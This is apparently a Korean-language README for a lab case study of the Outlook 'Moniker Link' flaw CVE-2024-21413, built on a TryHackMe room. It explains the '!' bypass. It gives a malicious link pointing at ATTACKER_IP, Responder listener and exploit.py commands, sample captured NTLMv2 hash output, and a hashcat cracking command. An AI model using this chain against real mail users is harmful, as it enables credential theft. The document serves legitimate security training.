
CVE-2024-21413에 관한 사례 연구. TryHackMe Moniker Link (CVE-2024-21413) 방을 매개변수로 사용. exploit에 claude code로 편집을 수행했습니다.
⚠️ 법적 고지: 이 저장소는 전적으로 교육 및 보안 연구 목적으로만 제공됩니다. 모든 데모는 통제되고 격리된 환경에서 수행되었습니다. 명시적 허가 없이 시스템에 이러한 기술을 사용하는 것은 불법이며 비윤리적입니다.
| 필드 | 세부 사항 |
|---|---|
| CVE | CVE-2024-21413 |
| 공개일 | 2024년 2월 13일 (Patch Tuesday) |
| CVSS 점수 | 9.8 (심각) |
| 제품 | Microsoft Outlook |
| 유형 | RCE + 자격 증명 유출 (NTLM 해시) |
| 벡터 | 네트워크 / 이메일 (사전 인증 불필요) |
| 상호작용 | 사용자 상호작용 필요 (링크 클릭) |
| 별칭 | Moniker Link |
CVE-2024-21413은 Microsoft Outlook의 치명적인 취약점으로, 공격자가 다음을 수행할 수 있습니다:
이름 "Moniker Link"는 COM(Component Object Model) Moniker — 문자열로 객체를 참조하는 Windows 메커니즘 — 를 악용하여 Outlook의 file:// 링크 보호를 우회하는 데서 유래했습니다.
일반적으로 Outlook은 네트워크 리소스를 가리키는 file:// 링크를 차단하고 보안 경고(보호된 보기)를 표시합니다. 취약점은 Outlook이 ! 문자를 포함하는 URL을 처리하는 방식에 있습니다. !는 Moniker 구분자입니다.
악성 링크 형식:
file:///\\ATTACKER_IP\share\!something
! 문자로 인해 Outlook 파서는 URL을 COM Moniker 참조로 해석하여 정상적인 보안 검사를 무시합니다. 결과:
공격자 이메일 전송 → 피해자 링크 클릭 → Outlook이 "!" URL 처리 → 보호된 보기 우회 → 자동 SMB 연결 → NTLM 해시 캡처
이 사례 연구를 안전하게 재현하려면:
| 머신 | 운영 체제 | 역할 |
|---|---|---|
| 공격자 | Kali Linux | SMB 리스너 + 익스플로잇 |
| 대상 | 취약한 Outlook이 있는 Windows 10/11 | 피해자 |
중요: 격리된 네트워크 사용 (VirtualBox/VMware의 NAT 또는 Host-Only). 실제 네트워크에서 실행하지 마세요.
# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder
# Python 3 — para rodar o exploit
python3 --version
# Verificar conectividade entre as máquinas
ping <IP_ALVO>
ip a | grep inet
# Anote o IP da interface que se comunica com o alvo (ex: 192.168.56.10)
Responder는 NTLM 인증 해시를 캡처하는 가짜 SMB 서버를 생성합니다.
sudo responder -I eth0 -v
# Substitua eth0 pela sua interface de rede
예상 출력:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash : usuario::DESKTOP-ALVO:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_SERVIDOR_EMAIL> \
--attacker-ip 192.168.56.10
피해자가 이메일을 열고 링크를 클릭하면 Responder가 자동으로 NTLM 해시를 캡처합니다. 이 해시는:
hashcat -m 5600 hash.txt wordlist.txt
전체 및 주석이 달린 스크립트는 exploit.py 파일을 참조하세요.
전체 공격 흐름의 대화형 시각화는 diagrama-ataque.html 파일을 참조하세요.
전체 완화 및 방어 가이드는 MITIGACAO.md 파일을 참조하세요.
취약점에 대한 상세 기술 분석은 CVE-BREAKDOWN.md 파일을 참조하세요.
TryHackMe를 통한 실전 모의 해킹 훈련의 일환으로 개발된 사례 연구.
이 프로젝트는 책임 있는 공개 및 윤리적 해킹 원칙을 따릅니다. 여기에 포함된 모든 콘텐츠는 교육과 보안 태세 개선을 목적으로 합니다.